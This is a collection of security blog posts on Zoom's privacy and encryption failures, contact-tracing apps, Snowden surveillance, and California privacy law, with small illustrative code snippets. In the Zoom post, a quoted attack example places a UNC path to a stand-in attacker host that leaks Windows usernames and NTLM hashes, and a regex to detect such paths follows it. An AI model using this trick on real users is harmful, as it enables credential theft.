SSL and internet security news

New Research: “Privacy Threats in Intimate Relationships”

I just published a new paper with Karen Levy of Cornell: “Privacy Threats in Intimate Relationships.”

Abstract: This article provides an overview of intimate threats: a class of privacy threats that can arise within our families, romantic partnerships, close friendships, and caregiving relationships. Many common assumptions about privacy are upended in the context of these relationships, and many otherwise effective protective measures fail when applied to intimate threats. Those closest to us know the answers to our secret questions, have access to our devices, and can exercise coercive power over us. We survey a range of intimate relationships and describe their common features. Based on these features, we explore implications for both technical privacy design and policy, and offer design recommendations for ameliorating intimate privacy risks.

This is an important issue that has gotten much too little attention in the cybersecurity community.

Zoom’s Commitment to User Security Depends on Whether You Pay It or Not

Zoom was doing so well…. And now we have this:

Corporate clients will get access to Zoom’s end-to-end encryption service now being developed, but Yuan said free users won’t enjoy that level of privacy, which makes it impossible for third parties to decipher communications.

“Free users for sure we don’t want to give that because we also want to work together with FBI, with local law enforcement in case some people use Zoom for a bad purpose,” Yuan said on the call.

This is just dumb. Imagine the scene in the terrorist/drug kingpin/money launderer hideout: “I’m sorry, boss. We could have had strong encryption to secure our bad intentions from the FBI, but we can’t afford the $20.” This decision will only affect protesters and dissidents and human rights workers and journalists.

Here’s advisor Alex Stamos doing damage control:

Nico, it’s incorrect to say that free calls won’t be encrypted and this turns out to be a really difficult balancing act between different kinds of harms. More details here:

Some facts on Zoom’s current plans for E2E encryption, which are complicated by the product requirements for an enterprise conferencing product and some legitimate safety issues. The E2E design is available here: https://github.com/zoom/zoom-e2e-whitepaper/blob/master/zoom_e2e.pdf

I read that document, and it doesn’t explain why end-to-end encryption is only available to paying customers. And note that Stamos said “encrypted” and not “end-to-end encrypted.” He knows the difference.

Anyway, people were rightly incensed by his remarks. And yesterday, Yuan tried to clarify:

Yuan sought to assuage users’ concerns Wednesday in his weekly webinar, saying the company was striving to “do the right thing” for vulnerable groups, including children and hate-crime victims, whose abuse is sometimes broadcast through Zoom’s platform.

“We plan to provide end-to-end encryption to users for whom we can verify identity, thereby limiting harm to vulnerable groups,” he said. “I wanted to clarify that Zoom does not monitor meeting content. We do not have backdoors where participants, including Zoom employees or law enforcement, can enter meetings without being visible to others. None of this will change.”

Notice that he specifically did not say that he was offering end-to-end encryption to users of the free platform, only to users “for whom we can verify identity,” which I’m guessing means users who give him a credit card number.

Zoom’s Twitter feed was similarly sloppy and evasive:

We are seeing some misunderstandings on Twitter today around our encryption. We want to provide these facts.

Zoom does not provide information to law enforcement except in circumstances such as child sexual abuse.

Zoom does not proactively monitor meeting content.

Zoom does not have backdoors where Zoom or others can enter meetings without being visible to participants.

AES 256 GCM encryption is turned on for all Zoom users — free and paid.

Those facts have nothing to do with any “misunderstanding.” That was about end-to-end encryption, which the statement very specifically left out of that last sentence. The corporate communications have been anything but clear and consistent.

Come on, Zoom. You were doing so well. Of course you should offer premium features to paying customers, but please don’t include security and privacy in those premium features. They should be available to everyone.

And, hey, this is kind of a dumb time to side with the police over protesters.

I have emailed the CEO and will report back if I hear from him. But for now, assume that the free version of Zoom will not support end-to-end encryption.

EDITED TO ADD (6/4): Another article.

EDITED TO ADD (6/4): I understand that this is complicated, both technically and politically. (Note, though, that Jitsi does it.) And, yes, lots of people confused end-to-end encryption with link encryption. (My readers tend to be more sophisticated than that.) My worry is that the “we’ll offer end-to-end encryption only to paying customers we can verify, even though there’s plenty of evidence that ‘bad purpose’ people will just get paid accounts” story plays into the dangerous narrative that encryption itself is dangerous when widely available. And I disagree with the notion that the possibility of child exploitation is a valid reason to deny security to large groups of people.

Bart Gellman on Snowden

Bart Gellman’s long-awaited (at least by me) book on Edward Snowden, Dark Mirror: Edward Snowden and the American Surveillance State, will finally be published in a couple of weeks. There is an adapted excerpt in the Atlantic.

It’s an interesting read, mostly about the government surveillance of him and other journalists. He speaks about an NSA program called FIRSTFRUITS that specifically spies on US journalists. (This isn’t news; we learned about this in 2006. But there are lots of new details.)

One paragraph in the excerpt struck me:

Years later Richard Ledgett, who oversaw the NSA’s media-leaks task force and went on to become the agency’s deputy director, told me matter-of-factly to assume that my defenses had been breached. “My take is, whatever you guys had was pretty immediately in the hands of any foreign intelligence service that wanted it,” he said, “whether it was Russians, Chinese, French, the Israelis, the Brits. Between you, Poitras, and Greenwald, pretty sure you guys can’t stand up to a full-fledged nation-state attempt to exploit your IT. To include not just remote stuff, but hands-on, sneak-into-your-house-at-night kind of stuff. That’s my guess.”

I remember thinking the same thing. It was the summer of 2013, and I was visiting Glenn Greenwald in Rio de Janeiro. This was just after Greenwald’s partner was detained in the UK trying to ferry some documents from Laura Poitras in Berlin back to Greenwald. It was an opsec disaster; they would have been much more secure if they’d emailed the encrypted files. In fact, I told them to do that, every single day. I wanted them to send encrypted random junk back and forth constantly, to hide when they were actually sharing real data.

As soon as I saw their house I realized exactly what Ledgett said. I remember standing outside the house, looking into the dense forest for TEMPEST receivers. I didn’t see any, which only told me they were well hidden. I guessed that black-bag teams from various countries had already been all over the house when they were out for dinner, and wondered what would have happened if teams from different countries bumped into each other. I assumed that all the countries Ledgett listed above — plus the US and a few more — had a full take of what Snowden gave the journalists. These journalists against those governments just wasn’t a fair fight.

I’m looking forward to reading Gellman’s book. I’m kind of surprised no one sent me an advance copy.

Another California Data Privacy Law

The California Consumer Privacy Act is a lesson in missed opportunities. It was passed in haste, to stop a ballot initiative that would have been even more restrictive:

In September 2017, Alastair Mactaggart and Mary Ross proposed a statewide ballot initiative entitled the “California Consumer Privacy Act.” Ballot initiatives are a process under California law in which private citizens can propose legislation directly to voters, and pursuant to which such legislation can be enacted through voter approval without any action by the state legislature or the governor. While the proposed privacy initiative was initially met with significant opposition, particularly from large technology companies, some of that opposition faded in the wake of the Cambridge Analytica scandal and Mark Zuckerberg’s April 2018 testimony before Congress. By May 2018, the initiative appeared to have garnered sufficient support to appear on the November 2018 ballot. On June 21, 2018, the sponsors of the ballot initiative and state legislators then struck a deal: in exchange for withdrawing the initiative, the state legislature would pass an agreed version of the California Consumer Privacy Act. The initiative was withdrawn, and the state legislature passed (and the Governor signed) the CCPA on June 28, 2018.

Since then, it has been substantially amended — that is, watered down — at the request of various surveillance capitalism companies. Enforcement was supposed to start this year, but we haven’t seen much yet.

And we could have had that ballot initiative.

It looks like Alastair Mactaggart and others are back.

Advocacy group Californians for Consumer Privacy, which started the push for a state-wide data privacy law, announced this week that it has the signatures it needs to get version 2.0 of its privacy rules on the US state’s ballot in November, and submitted its proposal to Sacramento.

This time the goal is to tighten up the rules that its previous ballot measure managed to get into law, despite the determined efforts of internet giants like Google and Facebook to kill it. In return for the legislation being passed, that ballot measure was dropped. Now, it looks like the campaigners are taking their fight to a people’s vote after all.

[…]

The new proposal would add more rights, including rights over the use and sale of sensitive personal information, such as health and financial information, racial or ethnic origin, and precise geolocation. It would also triple existing fines for companies caught breaking the rules surrounding data on children (under 16s) and would require an opt-in to even collect such data.

The proposal would also give Californians the right to know when their information is used to make fundamental decisions about them, such as getting credit or employment offers. And it would require political organizations to divulge when they use similar data for campaigns.

And, just to push the tech giants from fury into full-blown meltdown, the new ballot measure would require a majority vote in the legislature for any amendments to the law, effectively stripping their vast lobbying powers and cutting off the multitude of different ways the measure and its enforcement can be watered down within the political process.

I don’t know why they accepted the compromise in the first place. It was obvious that the legislative process would be hijacked by the powerful tech companies. I support getting this onto the ballot this year.

Me on COVID-19 Contact Tracing Apps

I was quoted in BuzzFeed:

“My problem with contact tracing apps is that they have absolutely no value,” Bruce Schneier, a privacy expert and fellow at the Berkman Klein Center for Internet & Society at Harvard University, told BuzzFeed News. “I’m not even talking about the privacy concerns, I mean the efficacy. Does anybody think this will do something useful? … This is just something governments want to do for the hell of it. To me, it’s just techies doing techie things because they don’t know what else to do.”

I haven’t blogged about this because I thought it was obvious. But from the tweets and emails I have received, it seems not.

This is a classic identification problem, and efficacy depends on two things: false positives and false negatives.

  • False positives: Any app will have a precise definition of a contact: let’s say it’s less than six feet for more than ten minutes (a minimal sketch of such a rule appears after this list). The false positive rate is the percentage of contacts that don’t result in transmissions. This will be because of several reasons. One, the app’s location and proximity systems — based on GPS and Bluetooth — just aren’t accurate enough to capture every contact. Two, the app won’t be aware of any extenuating circumstances, like walls or partitions. And three, not every contact results in transmission; the disease has some transmission rate that’s less than 100% (and I don’t know what that is).

  • False negatives: This is the rate the app fails to register a contact when an infection occurs. This also will be because of several reasons. One, errors in the app’s location and proximity systems. Two, transmissions that occur from people who don’t have the app (even Singapore didn’t get above a 20% adoption rate for the app). And three, not every transmission is a result of that precisely defined contact — the virus sometimes travels further.
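Here is the minimal sketch referred to above. It is my own illustration, not any real app’s code: a toy rule that flags a contact when the estimated distance between two phones stays under six feet for more than ten minutes. Everything downstream, both the false positives and the false negatives, hinges on how well the noisy GPS and Bluetooth distance estimates feed a rule like this.

```python
# Toy illustration (not any real app's code) of a "precise definition of a
# contact": estimated distance under 6 feet, sustained for more than 10 minutes.
from datetime import datetime, timedelta

CONTACT_DISTANCE_FT = 6.0
CONTACT_DURATION = timedelta(minutes=10)

def is_contact(readings):
    """readings: time-ordered list of (timestamp, estimated_distance_ft)."""
    run_start = None
    for ts, dist in readings:
        if dist < CONTACT_DISTANCE_FT:
            run_start = run_start or ts          # start (or continue) a proximity run
            if ts - run_start >= CONTACT_DURATION:
                return True
        else:
            run_start = None                     # proximity broken; reset the clock
    return False

# Example: 12 minutes of readings at an estimated 5 feet -> flagged as a contact.
start = datetime(2020, 5, 1, 12, 0)
readings = [(start + timedelta(minutes=m), 5.0) for m in range(13)]
print(is_contact(readings))  # True
```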

Assume you take the app out grocery shopping with you and it subsequently alerts you of a contact. What should you do? It’s not accurate enough for you to quarantine yourself for two weeks. And without ubiquitous, cheap, fast, and accurate testing, you can’t confirm the app’s diagnosis. So the alert is useless.
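To make that concrete, here is a back-of-the-envelope sketch. Every number in it is an assumption I picked purely for illustration; the point is only that multiplying several small probabilities together means an alert almost never corresponds to an actual transmission.

```python
# Back-of-the-envelope sketch of the base-rate problem. All rates below are
# assumptions chosen for illustration, not measured values.
prevalence     = 0.005   # fraction of people currently infectious (assumed)
p_real_contact = 0.5     # chance a flagged proximity event is a true epidemiological contact (assumed)
p_transmit     = 0.05    # chance a true contact with an infectious person causes infection (assumed)

# Probability that a single app alert means you were actually infected:
p_infected_given_alert = prevalence * p_real_contact * p_transmit
print(f"P(infected | alert) ~ {p_infected_given_alert:.4%}")              # 0.0125%

# Equivalently, the expected number of alerts per genuine transmission:
print(f"~ {1 / p_infected_given_alert:,.0f} alerts per real infection")   # ~8,000
```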

Similarly, assume you take the app out grocery shopping and it doesn’t alert you of any contact. Are you in the clear? No, you’re not. You actually have no idea if you’ve been infected.

The end result is an app that doesn’t work. People will post their bad experiences on social media, and people will read those posts and realize that the app is not to be trusted. That loss of trust is even worse than having no app at all.

It has nothing to do with privacy concerns. The idea that contact tracing can be done with an app, and not human health professionals, is just plain dumb.

EDITED TO ADD: This Brookings essay makes much the same point.

How Did Facebook Beat a Federal Wiretap Demand?

This is interesting:

Facebook Inc. in 2018 beat back federal prosecutors seeking to wiretap its encrypted Messenger app. Now the American Civil Liberties Union is seeking to find out how.

The entire proceeding was confidential, with only the result leaking to the press. Lawyers for the ACLU and the Washington Post on Tuesday asked a San Francisco-based federal court of appeals to unseal the judge’s decision, arguing the public has a right to know how the law is being applied, particularly in the area of privacy.

[…]

The Facebook case stems from a federal investigation of members of the violent MS-13 criminal gang. Prosecutors tried to hold Facebook in contempt after the company refused to help investigators wiretap its Messenger app, but the judge ruled against them. If the decision is unsealed, other tech companies will likely try to use its reasoning to ward off similar government requests in the future.

Here’s the 2018 story. Slashdot thread.

Global Surveillance in the Wake of COVID-19

OneZero is tracking thirty countries around the world that are implementing surveillance programs in the wake of COVID-19:

The most common form of surveillance implemented to battle the pandemic is the use of smartphone location data, which can track population-level movement down to enforcing individual quarantines. Some governments are making apps that offer coronavirus health information, while also sharing location information with authorities for a period of time. For instance, in early March, the Iranian government released an app that it pitched as a self-diagnostic tool. While the tool’s efficacy was likely low, given reports of asymptomatic carriers of the virus, the app saved location data of millions of Iranians, according to a Vice report.

One of the most alarming measures being implemented is in Argentina, where those who are caught breaking quarantine are being forced to download an app that tracks their location. In Hong Kong, those arriving in the airport are given electronic tracking bracelets that must be synced to their home location through their smartphone’s GPS signal.

California Needlessly Reduces Privacy During COVID-19 Pandemic

This one isn’t even related to contact tracing:

On March 17, 2020, the federal government relaxed a number of telehealth-related regulatory requirements due to COVID-19. On April 3, 2020, California Governor Gavin Newsom issued Executive Order N-43-20 (the Order), which relaxes various telehealth reporting requirements, penalties, and enforcements otherwise imposed under state laws, including those associated with unauthorized access and disclosure of personal information through telehealth mediums.

Lots of details at the link.

Contact Tracing COVID-19 Infections via Smartphone Apps

Google and Apple have announced a joint project to create a privacy-preserving COVID-19 contact tracing app. (Details, such as we have them, are here.) It’s similar to the app being developed at MIT, and similar to others being described and developed elsewhere. It’s nice seeing the privacy protections; they’re well thought out.

I was going to write a long essay about the security and privacy concerns, but Ross Anderson beat me to it. (Note that some of his comments are UK-specific.)

First, it isn’t anonymous. Covid-19 is a notifiable disease so a doctor who diagnoses you must inform the public health authorities, and if they have the bandwidth they call you and ask who you’ve been in contact with. They then call your contacts in turn. It’s not about consent or anonymity, so much as being persuasive and having a good bedside manner.

I’m relaxed about doing all this under emergency public-health powers, since this will make it harder for intrusive systems to persist after the pandemic than if they have some privacy theater that can be used to argue that the whizzy new medi-panopticon is legal enough to be kept running.

Second, contact tracers have access to all sorts of other data such as public transport ticketing and credit-card records. This is how a contact tracer in Singapore is able to phone you and tell you that the taxi driver who took you yesterday from Orchard Road to Raffles has reported sick, so please put on a mask right now and go straight home. This must be controlled; Taiwan lets public-health staff access such material in emergencies only.

Third, you can’t wait for diagnoses. In the UK, you only get a test if you’re a VIP or if you get admitted to hospital. Even so the results take 1-3 days to come back. While the VIPs share their status on twitter or facebook, the other diagnosed patients are often too sick to operate their phones.

Fourth, the public health authorities need geographical data for purposes other than contact tracing – such as to tell the army where to build more field hospitals, and to plan shipments of scarce personal protective equipment. There are already apps that do symptom tracking but more would be better. So the UK app will ask for the first three characters of your postcode, which is about enough to locate which hospital you’d end up in.

Fifth, although the cryptographers – and now Google and Apple – are discussing more anonymous variants of the Singapore app, that’s not the problem. Anyone who’s worked on abuse will instantly realise that a voluntary app operated by anonymous actors is wide open to trolling. The performance art people will tie a phone to a dog and let it run around the park; the Russians will use the app to run service-denial attacks and spread panic; and little Johnny will self-report symptoms to get the whole school sent home.

I recommend reading his essay in full. Also worth reading are this EFF essay, and this ACLU white paper.

To me, the real problems aren’t around privacy and security. The efficacy of any app-based contact tracing is still unproven. A “contact” from the point of view of an app isn’t the same as an epidemiological contact. And the ratio of contacts to infections is high. We would have to deal with the false positives (being close to someone else, but separated by a partition or other barrier) and the false negatives (not being close to someone else, but contracting the disease through a mutually touched object). And without cheap, fast, and accurate testing, the information from any of these apps isn’t very useful. So I agree with Ross that this is primarily an exercise in that false syllogism: Something must be done. This is something. Therefore, we must do it. It’s techies proposing tech solutions to what is primarily a social problem.

EDITED TO ADD: Susan Landau on contact tracing apps and how they’re being oversold. And Farzad Mostashari, former coordinator for health IT at the Department of Health and Human Services, on contact tracing apps.

As long as 1) every contact does not result in an infection, and 2) a large percentage of people with the disease are asymptomatic and don’t realize they have it, I can’t see how this sort of app is valuable. If we had cheap, fast, and accurate testing for everyone on demand…maybe. But I still don’t think so.

Security and Privacy Implications of Zoom

Over the past few weeks, Zoom’s use has exploded since it became the video conferencing platform of choice in today’s COVID-19 world. (My own university, Harvard, uses it for all of its classes. Boris Johnson had a cabinet meeting over Zoom.) Over that same period, the company has been exposed for having both lousy privacy and lousy security. My goal here is to summarize all of the problems and talk about solutions and workarounds.

In general, Zoom’s problems fall into three broad buckets: (1) bad privacy practices, (2) bad security practices, and (3) bad user configurations.

Privacy first: Zoom spies on its users for personal profit. It seems to have cleaned this up somewhat since everyone started paying attention, but it still does it.

The company collects a laundry list of data about you, including user name, physical address, email address, phone number, job information, Facebook profile information, computer or phone specs, IP address, and any other information you create or upload. And it uses all of this surveillance data for profit, against your interests.

Last month, Zoom’s privacy policy contained this bit:

Does Zoom sell Personal Data? Depends what you mean by “sell.” We do not allow marketing companies, or anyone else to access Personal Data in exchange for payment. Except as described above, we do not allow any third parties to access any Personal Data we collect in the course of providing services to users. We do not allow third parties to use any Personal Data obtained from us for their own purposes, unless it is with your consent (e.g. when you download an app from the Marketplace. So in our humble opinion, we don’t think most of our users would see us as selling their information, as that practice is commonly understood.

“Depends what you mean by ‘sell.'” “…most of our users would see us as selling…” “…as that practice is commonly understood.” That paragraph was carefully worded by lawyers to permit them to do pretty much whatever they want with your information while pretending otherwise. Do any of you who “download[ed] an app from the Marketplace” remember consenting to them giving your personal data to third parties? I don’t.

Doc Searls has been all over this, writing about the surprisingly large number of third-party trackers on the Zoom website and its poor privacy practices in general.

On March 29th, Zoom rewrote its privacy policy:

We do not sell your personal data. Whether you are a business or a school or an individual user, we do not sell your data.

[…]

We do not use data we obtain from your use of our services, including your meetings, for any advertising. We do use data we obtain from you when you visit our marketing websites, such as zoom.us and zoom.com. You have control over your own cookie settings when visiting our marketing websites.

There’s lots more. It’s better than it was, but Zoom still collects a huge amount of data about you. And note that it considers its home pages “marketing websites,” which means it’s still using third-party trackers and surveillance-based advertising. (Honestly, Zoom, just stop doing it.)

Now security: Zoom’s security is sloppy at best and malicious at worst. Motherboard reported that Zoom’s iPhone app was sending user data to Facebook, even if the user didn’t have a Facebook account. Zoom removed the feature, but its response should worry you about its sloppy coding practices in general:

“We originally implemented the ‘Login with Facebook’ feature using the Facebook SDK in order to provide our users with another convenient way to access our platform. However, we were recently made aware that the Facebook SDK was collecting unnecessary device data,” Zoom told Motherboard in a statement on Friday.

This isn’t the first time Zoom was sloppy with security. Last year, a researcher discovered that a vulnerability in the Mac Zoom client allowed any malicious website to enable the camera without permission. This seemed like a deliberate design choice: that Zoom designed its service to bypass browser security settings and remotely enable a user’s web camera without the user’s knowledge or consent. (EPIC filed an FTC complaint over this.) Zoom patched this vulnerability last year.

On 4/1, we learned that Zoom for Windows can be used to steal users’ Windows credentials.

Attacks work by using the Zoom chat window to send targets a string of text that represents the network location on the Windows device they’re using. The Zoom app for Windows automatically converts these so-called universal naming convention strings — such as \\attacker.example.com\C$ — into clickable links. In the event that targets click on those links on networks that aren’t fully locked down, Zoom will send the Windows usernames and the corresponding NTLM hashes to the address contained in the link.
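As a rough illustration of the mechanism (my own sketch, not Zoom’s code): the danger comes from auto-linkifying UNC-style strings. A client that recognizes the pattern can simply decline to turn it into a link.

```python
import re

# Simplified sketch: spot UNC-style network paths (\\host\share\...) in chat
# text so a client can refuse to render them as clickable links.
# Illustrative only; this is not Zoom's implementation.
UNC_PATTERN = re.compile(r"\\\\[\w.-]+\\\S+")

def strip_unc_links(message: str) -> str:
    """Replace UNC paths with a harmless placeholder before linkifying."""
    return UNC_PATTERN.sub("[network path removed]", message)

print(strip_unc_links(r"see \\attacker.example.com\C$\loot"))
# -> see [network path removed]
```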

On 4/2, we learned that Zoom secretly displayed data from people’s LinkedIn profiles, which allowed some meeting participants to snoop on each other. (Zoom has fixed this one.)

I’m sure lots more of these bad security decisions, sloppy coding mistakes, and random software vulnerabilities are coming.

But it gets worse. Zoom’s encryption is awful. First, the company claims that it offers end-to-end encryption, but it doesn’t. It only provides link encryption, which means everything is unencrypted on the company’s servers. From the Intercept:

In Zoom’s white paper, there is a list of “pre-meeting security capabilities” that are available to the meeting host that starts with “Enable an end-to-end (E2E) encrypted meeting.” Later in the white paper, it lists “Secure a meeting with E2E encryption” as an “in-meeting security capability” that’s available to meeting hosts. When a host starts a meeting with the “Require Encryption for 3rd Party Endpoints” setting enabled, participants see a green padlock that says, “Zoom is using an end to end encrypted connection” when they mouse over it.

But when reached for comment about whether video meetings are actually end-to-end encrypted, a Zoom spokesperson wrote, “Currently, it is not possible to enable E2E encryption for Zoom video meetings. Zoom video meetings use a combination of TCP and UDP. TCP connections are made using TLS and UDP connections are encrypted with AES using a key negotiated over a TLS connection.”

They’re also lying about the type of encryption. On 4/3, Citizen Lab reported

Zoom documentation claims that the app uses “AES-256” encryption for meetings where possible. However, we find that in each Zoom meeting, a single AES-128 key is used in ECB mode by all participants to encrypt and decrypt audio and video. The use of ECB mode is not recommended because patterns present in the plaintext are preserved during encryption.

The AES-128 keys, which we verified are sufficient to decrypt Zoom packets intercepted in Internet traffic, appear to be generated by Zoom servers, and in some cases, are delivered to participants in a Zoom meeting through servers in China, even when all meeting participants, and the Zoom subscriber’s company, are outside of China.

I’m okay with AES-128, but using ECB (electronic codebook) mode indicates that there is no one at the company who knows anything about cryptography.
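To see why the ECB finding is damning, here is a minimal demonstration using the Python cryptography package (my own sketch, unrelated to Zoom’s code). With ECB, identical plaintext blocks encrypt to identical ciphertext blocks, so structure in the audio or video leaks straight through; a randomized mode such as CTR (or GCM, which Zoom’s marketing claimed) does not have that property.

```python
# Minimal demo of ECB's weakness: identical plaintext blocks produce identical
# ciphertext blocks. Requires the third-party "cryptography" package.
import os
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

key = os.urandom(16)                       # AES-128, as Citizen Lab observed Zoom using
plaintext = b"ATTACK AT DAWN!!" * 4        # four identical 16-byte blocks

def encrypt(mode):
    enc = Cipher(algorithms.AES(key), mode).encryptor()
    return enc.update(plaintext) + enc.finalize()

ecb = encrypt(modes.ECB())
ctr = encrypt(modes.CTR(os.urandom(16)))   # randomized mode, shown for contrast

blocks = lambda ct: [ct[i:i + 16].hex() for i in range(0, len(ct), 16)]
print("ECB:", blocks(ecb))   # all four ciphertext blocks are identical
print("CTR:", blocks(ctr))   # all four ciphertext blocks differ
```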

And that China connection is worrisome. Citizen Lab again:

Zoom, a Silicon Valley-based company, appears to own three companies in China through which at least 700 employees are paid to develop Zoom’s software. This arrangement is ostensibly an effort at labor arbitrage: Zoom can avoid paying US wages while selling to US customers, thus increasing their profit margin. However, this arrangement may make Zoom responsive to pressure from Chinese authorities.

Or from Chinese programmers slipping backdoors into the code at the request of the government.

Finally, bad user configuration. Zoom has a lot of options. The defaults aren’t great, and if you don’t configure your meetings right you’re leaving yourself open to all sorts of mischief.

“Zoombombing” is the most visible problem. People are finding open Zoom meetings, classes, and events; joining them; and sharing their screens to broadcast offensive content — porn, mostly — to everyone. It’s awful if you’re the victim, and a consequence of allowing any participant to share their screen.

Even without screen sharing, people are logging in to random Zoom meetings and disrupting them. It turns out that Zoom didn’t make the meeting ID long enough to prevent someone from randomly trying IDs, looking for open meetings. This isn’t new; Check Point Research reported it last summer. Instead of making the meeting IDs longer or more complicated — which it should have done — Zoom enabled meeting passwords by default. Of course most of us don’t use passwords, and there are now automatic tools for finding Zoom meetings.
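A quick sketch of why short numeric IDs are a problem. Zoom meeting IDs are roughly 9 to 11 digits; the other numbers below are assumptions I made up for illustration, but the shape of the math is the point: the ID space is small enough that blind guessing finds real meetings.

```python
# Rough sketch of the meeting-ID guessing math. The ID-space size reflects a
# 9-digit numeric ID; the other figures are assumptions for illustration.
id_space         = 10 ** 9      # possible 9-digit meeting IDs
active_meetings  = 10 ** 6      # concurrently active meetings (assumed)
guesses_per_hour = 100_000      # automated guesses an attacker can try (assumed)

p_hit_per_guess = active_meetings / id_space
expected_hits_per_hour = guesses_per_hour * p_hit_per_guess
print(f"Expected valid meeting IDs found per hour: {expected_hits_per_hour:.0f}")  # 100
```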

For help securing your Zoom sessions, Zoom has a good guide. Short summary: don’t share the meeting ID more than you have to, use a password in addition to a meeting ID, use the waiting room if you can, and pay attention to who has what permissions.

That’s what we know about Zoom’s privacy and security so far. Expect more revelations in the weeks and months to come. The New York Attorney General is investigating the company. Security researchers are combing through the software, looking for other things Zoom is doing and not telling anyone about. There are more stories waiting to be discovered.

Zoom is a security and privacy disaster, but until now had managed to avoid public accountability because it was relatively obscure. Now that it’s in the spotlight, it’s all coming out. (Their 4/1 response to all of this is here.) On 4/2, the company said it would freeze all feature development and focus on security and privacy. Let’s see if that’s anything more than a PR move.

In the meantime, you should either lock Zoom down as best you can, or — better yet — abandon the platform altogether. Jitsi is a distributed, free, and open-source alternative. Start your meeting here.

EDITED TO ADD: Fight for the Future is on this.

Steve Bellovin’s comments.

Meanwhile, lots of Zoom video recordings are available on the Internet. The article doesn’t have any useful details about how they got there:

Videos viewed by The Post included one-on-one therapy sessions; a training orientation for workers doing telehealth calls, which included people’s names and phone numbers; small-business meetings, which included private company financial statements; and elementary-school classes, in which children’s faces, voices and personal details were exposed.

Many of the videos include personally identifiable information and deeply intimate conversations, recorded in people’s homes. Other videos include nudity, such as one in which an aesthetician teaches students how to give a Brazilian wax.

[…]

Many of the videos can be found on unprotected chunks of Amazon storage space, known as buckets, which are widely used across the Web. Amazon buckets are locked down by default, but many users make the storage space publicly accessible either inadvertently or to share files with other people.
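For context on how that exposure happens: an S3 bucket is private by default, but a single ACL grant (or bucket policy) to the AllUsers group makes its contents readable by anyone on the Internet. Here is a small sketch, using boto3, of how an owner could audit a bucket’s ACL; it assumes AWS credentials are configured, and “your-bucket-name” is a placeholder.

```python
# Sketch: check whether an S3 bucket's ACL grants access to "AllUsers"
# (i.e., the entire Internet). Assumes boto3 is installed and AWS credentials
# are configured; "your-bucket-name" is a placeholder.
import boto3

ALL_USERS = "http://acs.amazonaws.com/groups/global/AllUsers"

s3 = boto3.client("s3")
acl = s3.get_bucket_acl(Bucket="your-bucket-name")

public_grants = [
    grant for grant in acl["Grants"]
    if grant.get("Grantee", {}).get("URI") == ALL_USERS
]
if public_grants:
    print("Publicly accessible:", [g["Permission"] for g in public_grants])
else:
    print("No AllUsers grants in the bucket ACL.")
```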
